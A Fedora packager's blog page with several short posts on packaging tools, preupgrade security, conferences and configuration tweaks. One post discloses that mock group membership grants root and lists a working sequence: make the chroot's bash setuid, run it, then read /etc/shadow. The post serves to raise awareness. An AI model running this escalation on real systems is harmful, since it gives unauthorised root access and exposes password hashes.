blogTILLuDROP

Today I published my git repository of the tool I started to write to supply a upstream release monitoring service to Fedora. Some time ago Michał Bentkowski wrote a tool called FEVer to do this, but he became unresposive and did not publish the full code of FEVer. Since I missed this service, I started to write a new tool, that can provide the same service, which is currently called “cnucnu”, because of the lack of a better name. It does not have any bugzilla reporting features yet, but they will be added eventually. At the time of this posting, it only supports to check all packages that are listed on the Fedora wiki page of FEVer and to test regular expressions for easy development of one for a new package.

I just wanted to try out preupgrade to update to Fedora 11, but then I was disappointed that it does not verify securely what it is downloading and installing onto my system. And even worse, this is not even announced by preupgrade. It is so strange, on the one hand all rpm packages are signed and even the algorithms used are updated, but on the other hand the signatures are not used. So please be aware that if you use preupgrade, it will not verify that the installed content came from Fedora.

I just registered for BruCON, because the early bird tickets are only available for two more days. Will you come, too? It would be nice to meet some Fedorians there, but I guess I would have more luck at some generic FOSS conference.

I wonder how well known it is that installing mock and adding a user to the mock groups means giving this user root access most of the time. I know the authors of mock now and also some people on fedora-devel, but did you know? In case you wonder how it works, here is one way to do this:

$ /usr/bin/mock --init -r fedora-10-i386
$ /usr/bin/mock --shell -r fedora-10-i386
mock-chroot> chmod u+s bin/bash
$ /var/lib/mock/fedora-10-i386/root/bin/bash -p
# cat /etc/shadow

Since I started packaging, I was always annoyed by rpmbuild’s demand for it’s strange directory structure for input and output files. Therefore I wrote this little script to get a rpmbuild that uses the current directory for all these directories. Maybe there is one missing, because a recent rpm version now uses a BUILDROOT directory. Maybe one can define _buildrootdir for this, but I did not yet have any need for it.


$ cat rpmbuild-currentdir.sh
#! /bin/bash

/usr/bin/rpmbuild –define “_sourcedir .” –define “_rpmdir .” –define “_buildir .” –define “_srcrpmdir .” –define “_speccdir .” “$@”

On Fedora 8 already my bluetooth disable button on my thinkpad was broken somehow. It works fine in grub, but iirc once udev is started, it stops working. Since I nearly never use bluetooth, this does not much harm to me. But since Fedora 9, bluetooth is always enabled during boot and then it sucks, that I am not able to disable it again easily. Talking with an expert about this, he told me, that bluetooth can easily disabled with this command:

echo disable > /proc/acpi/ibm/bluetooth


I was also told, that it is possbible to use acpid to run this command when the key is pressed. Nevertheless I wonder, why this out-of-the box since I buyed the thinkpad working button was broken. Asking on the hal-mailinglist did do get me any reply, so if you know anything helpful, please leave a comment. :-)

On the FESCo meeting on 2008-09-17 the removal of the force-tag make target was decided. But it was also decided to still allow to change cvs tags using

TAG_OPTS=-F make tag

If you want your force-tag target back, simply add this to your ~/.cvspkgsrc file (the first character of the second line should be a tab character):

force-tag: $(SPECFILE) $(COMMON_DIR)/branches
@$(MAKE) tag TAG_OPTS="-F $(TAG_OPTS)"

To ease your life, you can also download this code from my fedorapeople space.

secure:

ssh fedorapeople.org cat /home/fedora/till/public_html/files/cvspkgsrc-force-tag.gmk >> .cvspkgsrc


insecure:

curl http://till.fedorapeople.org/files/cvspkgsrc-force-tag.gmk >> .cvspkgsrc


Don’t forget to check your .cvspkgsrc afterwards.

The Package Review SIG created some webpages that cache bugzilla queries of package review requests. The pages are currently updated every hour and are a lot faster to load than doing direct queries at bugzilla. This is not something new, but it would be nice if 719 of you readers would pick up a ticket from the unassigned list and perform a review. ;-)

Here are the lists:

Unassigned Review Requests – Review Requests in progress – Accepted Review Requests – Rejected Review Requests

Unfortunately I am not yet able to use my gpg key to create working signed rpms. But during debugging this I had to sign lots of test rpms nevertheless and enter a new password every time. Luckily during the debugging it became clear how to make rpm use the gpg-agent instead of passing the password via a file descriptor to gpg.

Thanks go to Jeff Johnson for motivating me to do this and telling me, that it is ok to modify %__gpg_sign_cmd. And also to Panu Matilainen for backing this up. I normally have a strong aversion against modifying macros that begin with two underlines, but with this encouragement it is not that bad. ;-)

That’s enough talk, here comes the code:

I added this to my ~/.rpmmacros file:

%__gpg_check_password_cmd /bin/true
%__gpg_sign_cmd %{__gpg} gpg --batch --no-verbose --no-armor --use-agent --no-secmem-warning -u "%{_gpg_name}" -sbo %{__signature_filename} %{__plaintext_filename}

Now rpm will still ask for a password, but one can enter anything. If the gpg-agent needs a password to unlock a key, it will just fire up the pinentry command, which will then allow three password entry attempts by default. If entering an empty password for rpm is still too annyoing for you, Aaron Hawley described how to use expect to provide a password to rpm.

Hello fellow Fedorians, I was so happy when I noticed that the 25C3 was added to the Fedora events page, to meet more of you in person. But now I checked who will be there and noticed, that there is only one other one other attendee. I guess you all did not notice, that there is a event page for The Congress, but you know now. :-) So please add yourself now! And don’t forget to join the GPG-keysigning event.